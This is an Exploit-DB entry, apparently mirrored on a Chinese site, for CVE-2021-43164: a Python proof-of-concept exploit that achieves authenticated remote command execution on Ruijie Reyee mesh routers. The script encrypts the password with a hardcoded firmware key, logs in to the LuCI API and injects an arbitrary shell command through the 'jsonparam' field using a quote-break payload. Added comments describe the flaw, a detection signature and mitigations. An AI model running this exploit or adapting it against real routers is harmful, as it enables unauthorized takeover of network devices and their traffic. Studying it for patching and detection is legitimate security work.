Ruijie Reyee Mesh Router – Remote Code Execution (RCE) (Authenticated)

  • 作者: Minh Khoa
    日期: 2022-05-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50930/
  • # Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
    # Google Dork: None
    # Date: November 1, 2021
    # Exploit Author: Minh Khoa of VSEC
    # Vendor Homepage: https://ruijienetworks.com
    # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
    # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
    # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
    # CVE: CVE-2021-43164
    
    #!/usr/bin/python3
    
    import os
    import sys
    import time
    import requests
    import json
    
    def enc(PASS):
        """Return *PASS* encrypted the way the router's login handler expects.

        Shells out to the ``openssl`` CLI: AES-256-CBC, base64 output
        (``-a``), passphrase-derived key (``-k``) with ``-md md5``, the
        passphrase being the constant ``key`` below. Returns the command's
        stdout with surrounding whitespace stripped; if ``openssl`` is
        missing or fails, stderr is discarded and an empty string comes
        back, which the caller does not check.

        NOTE(review): ``PASS`` is placed inside single quotes in a
        string-built shell command, so a password containing ``'``
        terminates the quoted argument and the rest is interpreted by the
        shell (a list-form ``subprocess`` call with ``input=`` would avoid
        that). Because the key is a constant in this file, the scheme
        hides the password only from casual inspection, not from anyone
        who knows the key.
        """
        key = "RjYkhwzx$2018!"
        # Raw shell pipeline; stderr is silenced, so any failure yields "".
        shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
        return os.popen(shell).read().strip()
    
    # --- argument handling -----------------------------------------------
    # Four positional CLI arguments. A missing one raises IndexError, which
    # the broad ``except Exception`` turns into the usage text; any other
    # error raised in this block would be masked the same way.
    try:
        TARGET= sys.argv[1]
        USER= sys.argv[2]
        PASS= sys.argv[3]
        COMMAND = sys.argv[4]
    except Exception:
        print("CVE-2021-43164 PoC")
        print("Usage: python3 exploit.py <target> <user> <pass> <command>")
        print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
        sys.exit(1)

    # --- step 1: authenticate --------------------------------------------
    # JSON login against the LuCI API over plain HTTP, so the (openssl-
    # encrypted) password and the returned session id cross the wire
    # without TLS. ``encry`` presumably tells the handler that ``password``
    # is the enc() form rather than cleartext — confirm against the
    # firmware; ``time`` is the current epoch second.
    endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
    payload = {
        "method": "login",
        "params": {
            "username": USER,
            "password": enc(PASS),
            "encry": True,
            "time": int(time.time()),
            "limit": False
        }
    }

    # No timeout is set: an unreachable host blocks here indefinitely.
    r = requests.post(endpoint, json=payload)
    # Session id from the login response. A rejected login or a non-JSON
    # reply raises here (e.g. JSONDecodeError, KeyError) with no friendlier
    # message; nothing below runs without a sid, so this is the gate that
    # makes the issue authenticated-only.
    sid = json.loads(r.text)["data"]["sid"]

    # --- step 2: call the vulnerable handler -----------------------------
    # Authenticated call to the wireless API's ``updateVersion`` method.
    # The sid travels in the URL query string, so it lands in any proxy or
    # web-server access log. The ``jsonparam`` value is the quote-close /
    # statement-terminate / comment-out shape (``'; ... #``), which only
    # works if the affected firmware (versions in the header) hands that
    # parameter to a shell unescaped — that is the CVE-2021-43164 defect.
    #
    # Detection: a POST to /cgi-bin/luci/api/wireless whose ``jsonparam``
    # contains shell metacharacters (``';``, ``#``) is the signature of
    # this PoC; it is preceded by an auth POST with ``"encry": true``.
    # Mitigation: a vendor firmware build in which the handler no longer
    # passes ``jsonparam`` to a shell (check the vendor advisory for the
    # fixed version), plus keeping the management interface off untrusted
    # networks and credentials strong, since a valid login is required.
    endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
    payload = {
        "method": "updateVersion",
        "params": {
            "jsonparam": "'; {} #".format(COMMAND)
        }
    }

    # Also without a timeout.
    r = requests.post(endpoint, json=payload)
    # Raw response body, printed unparsed; the script does not interpret it.
    print(r.text)